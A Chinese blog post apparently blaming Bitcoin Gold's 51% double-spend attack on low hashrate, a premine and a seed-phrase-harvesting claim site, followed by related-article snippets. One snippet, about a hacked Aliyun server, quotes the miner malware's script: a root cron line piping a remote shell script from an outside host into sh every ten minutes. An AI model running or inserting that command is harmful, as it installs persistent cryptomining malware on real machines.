比特币黄金(BTG)遭受51%双花攻击?——不亏

自2017年8月1日比特币现金(BCH)硬分叉之后,比特币硬分叉就已成为一种潮流,BTG、B2X、BCD、SBTC、BCHC等等诸多分叉币不绝于耳。然而其中却有一个另类,那就是BTG。
其另类的主要原因在于,相对于其他分叉币,BTG并没有对比特币进行扩容,依然采用1M区块+SegWit设定。其主要改变在于挖矿算法,对ASIC矿机进行了限制,转而通过电脑GPU挖矿。
总而言之,BTG的GPU挖矿设想,旨在解决比特币挖矿算力过于集中的问题,保证其去中心化的特性。然而现实却并没有想象中的美好,GUP挖矿依然存在难以避免的缺陷。
数日前,BTG上演51%双花攻击,直接让双花攻击的理论从理想走进了现实。许多人都曾探讨过51%攻击,毕竟一旦发生,可以让整个网络直接崩溃,瞬间归零也并非不可能。但是51%攻击难度之大,让其长期停留在理论层面,BTG此番上演51%攻击,倒也是真切的秀了一下。
首先,BTG无法获取分叉前比特币开发团队的支持。BTG并没有对区块上限扩容,这也注定了其无法获取大区块支持者的拥护,但是小区块支持者的core团队,也并不会给予一个山寨币BTG真正的支持,甚至连某些代码BTG都无法使用。

其次,无人问津的社区,笔者专程去浏览了一下BTG的社区,特别是巴比特,大部分的帖子还停留在去年,18年前4个月的帖子也是寥寥无几,近两日才又多了起来,不排除BTG团队近日雇人发帖的情况,或许是转移注意力,又或许是转嫁被攻击的危机。但是无论如何,BTG的用户数量较少是无可辩驳的,较少的用户必然决定了BTG的总算力较小,存在被51%攻击的风险也是早就注定的。

最后,浑身是坑的开发团队。BTG还未分叉前,就已经激起了众怒,一个是开发团队预挖 1%的BTG,对于数字货币来说,预挖是不道德的,它摧毁了数字货币的基础——公平,一个不把公平放在眼里的团队,又能如何对待它的用户呢?第二个是,BTG团队对用户私钥的骗取,在其分叉之前,它允许用户在分叉发生前“索取”BTG,但是在网站上给出了一个关于如何找到并输入比特币钱包种子短语的详细步骤说明。该平台声称自己是比特币黄金的钱包。但是任何要求用户在代币出现前在网上输入自己钱包种子的网站,都可能会导致人们失去自己的财产。这样的开发团队,自然不会在BTG的安全性上下多大功夫,遭受攻击也是情理之中。

一个浑身是坑的开发团队,开发了一个漏洞重重的网络,想要用户的支持?没可能的,遭受51%双花攻击是命里注定的。

原文地址:http://blog.51cto.com/13775559/2122022

时间: 2024-08-06 19:12:15

比特币黄金(BTG)遭受51%双花攻击?——不亏的相关文章

BCC比特币网络被51%算力攻击,真的好吗?

数字货币现成交易系统(电/微138-2315-3926)对于非技术人员来说,比特币目前采用的是SHA256算法,其共识机制被称为工作量证明(POW).但如果比特币的算法从SHA256更改为其他的算法, POW协议是可以被更改的. 理论上,基于区块链技术开发的所有POW币都是存在51%算力攻击风险,BCC作为比特币孪生兄弟也不例外,依旧是存在51%攻击的风险.51%攻击曾被认为是比特币最大的风险,一些矿池也曾一度占到全网算力51%以上,但51%攻击并未发生,也只是停留在理论阶段. 当前存在着数十种

比特币双花攻击

双花:就是双重支付,一笔资金被花费了两次. 在传统的交易中,因为有银行这样的中心化机构,所以是不会存在双花问题的:每一笔支付都将从你的银行账户中扣除相应的资金,所有的明细在银行都有记录.但是在比特币中,没有账户的概念,而是引入了UTXO,即未花费交易输出.因为没有银行这样的中心化机构的保证,当发生一笔交易时就可能存在着双花的危险:比方说A有一个比特币,然后他同时构造两笔交易T1和T2来花费这1个比特币,其中一个给了B,从B那里买件衣服,一个给了C,从C那里买双鞋.如果不引入某种机制来避免这种情况

如何避免遭受HTTS中间人攻击

先前为大家说明了如何对App的HTTPS通讯进行中间人攻击,听起来很吓人吧-表示若是使用手机的网银或购物等App,便有可能暴露在风险之中. 会发生HTTPS遭受拦截的主要原因是客户端的App未对服务器端的SSL证书进行验证所致.如此一来,有心人士便有了可趁之机,借由中间人攻击手法,分别对客户端的App及服务器端,建立通信,并让2端以为是在对彼此直接通信,便能达到窃听双方通信内容的目的. 也许金融业者会问道:那要如何解决呢?其实,从源头下手即可.意即,修改App源码,加入验证程序的代码,而不要偷懒

遭受刷验证码攻击后的企安建设规划感想

背景 公司上市不到两周,便遭受到了黑客攻击,其中笔者团队的验证码比较容易识别,攻击者通过ORC识别刷了10几万的短信,除了造成一笔资金开销外,也给服务器带来了很大的压力: 并且在阿里云的控制台当中每天都能看到很多攻击信息,却没有拦截,原因是没有购买WAF防火墙,售后也频繁催促购买其安全设施:所以技术负负责人也开始重视起安全问题来,笔者因为懂一些安全技术,所以老大希望笔者在这方面做一些规划指导,周末花了点时间根据公司的现状做了一下规划设想,下文便是当时的口述汇报,后来整理成了文字版,给读者做一些参

网站遭受大量CC攻击后的应对策略

上周开始我网站遭受了一大波CC攻击,到目前为止仍在继续,作为一个建站小白,我感觉压力好大,又有新的问题要挑战了! 服务器架设在腾讯云,CC攻击很凶猛,带宽瞬间占满,于是在腾讯云后台配置安全组关闭了80端口,流量瞬间下来了. 服务器上装的安全狗也疯狂报警.. 看来真正遇到问题时,安全狗也顶不住啊,在此鄙视一下. 攻击的IP来自境外的较多,基于程序狗的惯性思维,我想到了在腾讯云后台配置安全组规则,屏蔽这些IP访问. 于是第一步,分析IIS日志,提取IP. 日志数据量大,看来不写个软件搞不腚呀! 然后

如何防止ASP.NET网站遭受CSRF的攻击

转载地址: http://www.cnblogs.com/shanyou/p/5038794.html?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF.CSRF(Cross Site Request Forger

阿里云主机遭受minerd类型攻击

现象:就是cpu使用率超级大,能到300% 木马脚本内容: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * cu

评蔡文胜区块链10问,数字货币不等于区块链,套路韭菜不要太明显

昨天上午,一则蔡文胜.薛蛮子.帅初等人对区块链进行讨论的微信聊天记录开始在网络传播.在聊天对话中,蔡文胜.帅初.慕岩.陈伟星.沈波.易理华.点付大头.FBG周硕基等人就区块链领域的多个问题发表了自己的观点. 其中,蔡文胜的10个区块链观点被人整理后被人传播.就网络传播蔡文胜的10个观点,何玺并不认同,下面何玺就蔡文胜的10个观点也说说自己的看法. 蔡文胜10个关于区块链的观点,如下: 1.我为什么看好区块链? "我算比较早了解比特币,大概2011就知道,在2014投资okcoin,也买了第一块比

务器遭受攻击后的一般处理过程

一.处理服务器遭受攻击的一般思路 系统遭受攻击并不可怕,可怕的是面对攻击束手无策,下面就详细介绍下在服务器遭受攻击后的一般处理思路. 1.切断网络 所有的攻击都来自于网络,因此,在得知系统正遭受黑客的攻击后,首先要做的就是断开服务器的网络连接,这样除了能切断攻击源之外,也能保护服务器所在网络的其他主机. 2.查找攻击源 可以通过分析系统日志或登录日志文件,查看可疑信息,同时也要查看系统都打开了哪些端口,运行哪些进程,并通过这些进程分析哪些是可疑的程序.这个过程要根据经验和综合判断能力进行追查和分